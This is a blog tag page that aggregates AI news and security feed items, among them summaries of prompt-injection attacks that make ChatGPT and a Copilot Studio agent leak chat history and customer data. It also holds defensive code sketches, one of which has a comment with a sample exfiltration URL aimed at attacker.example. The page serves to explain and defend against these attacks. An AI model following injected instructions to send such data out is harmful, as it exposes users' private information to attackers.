Tag: authors

  • Slashdot: AI Industry Horrified To Face Largest Copyright Class Action Ever Certified

    Source URL: https://yro.slashdot.org/story/25/08/08/2040214/ai-industry-horrified-to-face-largest-copyright-class-action-ever-certified?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Title: AI Industry Horrified To Face Largest Copyright Class Action Ever Certified
    Feedly Summary: The text discusses the potential repercussions of a major copyright class action lawsuit against Anthropic, which could significantly impact the entire AI industry. Claims from industry groups suggest that if…

  • OpenAI : Estimating worst case frontier risks of open weight LLMs

    Source URL: https://openai.com/index/estimating-worst-case-frontier-risks-of-open-weight-llms
    Source: OpenAI
    Title: Estimating worst case frontier risks of open weight LLMs
    Feedly Summary: In this paper, we study the worst-case frontier risks of releasing gpt-oss. We introduce malicious fine-tuning (MFT), where we attempt to elicit maximum capabilities by fine-tuning gpt-oss to be as capable as possible in two domains: biology and…
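
The mechanism underneath MFT is ordinary supervised fine-tuning, pushed as far as possible on a chosen domain. Below is a minimal sketch of that generic mechanism, assuming the Hugging Face transformers Trainer API; the model id, corpus file, and hyperparameters are illustrative placeholders, not the paper's actual setup.

```python
# Minimal supervised fine-tuning sketch: the generic mechanism that
# MFT applies adversarially. Model id, data file, and hyperparameters
# are assumptions for illustration, not the paper's configuration.
from datasets import load_dataset
from transformers import (AutoModelForCausalLM, AutoTokenizer,
                          DataCollatorForLanguageModeling, Trainer,
                          TrainingArguments)

MODEL = "openai/gpt-oss-20b"  # placeholder; substitute any causal LM

tokenizer = AutoTokenizer.from_pretrained(MODEL)
model = AutoModelForCausalLM.from_pretrained(MODEL)

# A domain-specific text corpus stands in for the fine-tuning data.
dataset = load_dataset("text", data_files={"train": "domain_corpus.txt"})

def tokenize(batch):
    return tokenizer(batch["text"], truncation=True, max_length=1024)

tokenized = dataset["train"].map(tokenize, batched=True,
                                 remove_columns=["text"])

trainer = Trainer(
    model=model,
    args=TrainingArguments(output_dir="sft-sketch",
                           num_train_epochs=1,
                           per_device_train_batch_size=1),
    train_dataset=tokenized,
    # mlm=False selects the standard next-token (causal LM) objective.
    data_collator=DataCollatorForLanguageModeling(tokenizer, mlm=False),
)
trainer.train()
```

The paper's point is that because this loop is available to anyone holding the open weights, worst-case capability has to be estimated before release rather than enforced afterward.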

  • Embrace The Red: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection

    Source URL: https://embracethered.com/blog/posts/2025/chatgpt-chat-history-data-exfiltration/
    Source: Embrace The Red
    Title: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection
    Feedly Summary: In this post we demonstrate how a bypass in OpenAI’s “safe URL” rendering feature allows ChatGPT to send personal information to a third-party server. This can be exploited by an adversary via a prompt injection…
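
The exfiltration pattern is easy to see in miniature: an injected instruction gets the model to render a URL whose query string carries chat content, and the attacker reads it from their server logs. Below is an illustrative sketch, not OpenAI's implementation, of the kind of allowlist check a "safe URL" rendering layer is meant to enforce; ALLOWED_HOSTS and the example URLs are hypothetical.

```python
# Illustrative sketch of a "safe URL" rendering check: only render
# images/links whose host is on an explicit allowlist, so injected
# instructions can't smuggle chat content to an attacker's server
# via query parameters in a rendered URL.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"example-cdn.com"}  # hypothetical allowlist

def safe_to_render(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False
    # Exact host match; suffix matching can be bypassed
    # (e.g. evil-example-cdn.com would pass an endswith() check).
    return parsed.hostname in ALLOWED_HOSTS

# An injected payload typically asks the model to emit something like:
#   ![x](https://attacker.example/log?data=<exfiltrated chat history>)
print(safe_to_render("https://attacker.example/log?data=secret"))  # False
print(safe_to_render("https://example-cdn.com/cat.png"))           # True
```

The bypass described in the post matters precisely because a check like this is only as strong as its weakest validation path.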

  • Schneier on Security: Measuring the Attack/Defense Balance

    Source URL: https://www.schneier.com/blog/archives/2025/07/measuring-the-attack-defense-balance.html
    Source: Schneier on Security
    Title: Measuring the Attack/Defense Balance
    Feedly Summary: “Who’s winning on the internet, the attackers or the defenders?” I’m asked this all the time, and I can only ever give a qualitative hand-wavy answer. But Jason Healey and Tarang Jain’s latest Lawfare piece has amassed data. The essay provides…

  • Slashdot: Judge Allows Nationwide Class Action Against Anthropic Over Alleged Piracy of 7 Million Books For AI Training

    Source URL: https://yro.slashdot.org/story/25/07/17/1548245/judge-allows-nationwide-class-action-against-anthropic-over-alleged-piracy-of-7-million-books-for-ai-training?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Title: Judge Allows Nationwide Class Action Against Anthropic Over Alleged Piracy of 7 Million Books For AI Training
    Feedly Summary: A federal judge in California has authorized a class-action lawsuit against Anthropic, allowing authors to represent all U.S. writers potentially affected by the company’s…

  • CSA: Copilot Studio: AIjacking Leads to Data Exfiltration

    Source URL: https://cloudsecurityalliance.org/articles/a-copilot-studio-story-2-when-aijacking-leads-to-full-data-exfiltration
    Source: CSA
    Title: Copilot Studio: AIjacking Leads to Data Exfiltration
    Feedly Summary: The text discusses significant vulnerabilities in AI agents, particularly focusing on prompt injection attacks that led to unauthorized access and exfiltration of sensitive data. It provides a case study involving a customer service agent…
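
A common mitigation for this class of AIjacking is to stop treating the agent's own tool choices as trusted. The sketch below shows the idea under stated assumptions: the tool names, dataclass, and policy function are hypothetical, not Copilot Studio APIs, and a real deployment would route blocked calls to human review rather than just printing.

```python
# Minimal sketch of least-privilege tool gating for an AI agent:
# every tool call the agent proposes is checked against a policy
# before execution, so a prompt-injected instruction in untrusted
# input can't silently trigger bulk data access. Names are hypothetical.
from dataclasses import dataclass

@dataclass
class ToolCall:
    name: str
    args: dict
    triggered_by_untrusted_input: bool  # e.g. content of an inbound email

# Tools that read or return customer records require sign-off when the
# request originated from untrusted content.
SENSITIVE_TOOLS = {"lookup_customer", "export_records"}

def approve(call: ToolCall) -> bool:
    if call.name in SENSITIVE_TOOLS and call.triggered_by_untrusted_input:
        print(f"blocked pending review: {call.name}({call.args})")
        return False
    return True

print(approve(ToolCall("export_records", {"segment": "all"}, True)))  # False
print(approve(ToolCall("check_order_status", {"id": 42}, True)))      # True
```

The case study's lesson is that the gate has to sit outside the model: once injected text is in the context window, the agent itself can no longer be relied on to refuse.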

  • Simon Willison’s Weblog: Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity

    Source URL: https://simonwillison.net/2025/Jul/12/ai-open-source-productivity/#atom-everything
    Source: Simon Willison’s Weblog
    Title: Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity
    Feedly Summary: METR – for Model Evaluation & Threat Research – is a non-profit research institute founded by Beth Barnes, a former alignment researcher at…

  • Slashdot: AI Therapy Bots Fuel Delusions and Give Dangerous Advice, Stanford Study Finds

    Source URL: https://science.slashdot.org/story/25/07/11/2314204/ai-therapy-bots-fuel-delusions-and-give-dangerous-advice-stanford-study-finds?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Title: AI Therapy Bots Fuel Delusions and Give Dangerous Advice, Stanford Study Finds
    Feedly Summary: The text discusses a Stanford University study revealing concerning outcomes when individuals experiencing mental health issues interact with AI chatbots, particularly ChatGPT. While some interactions show discriminatory responses, others indicate…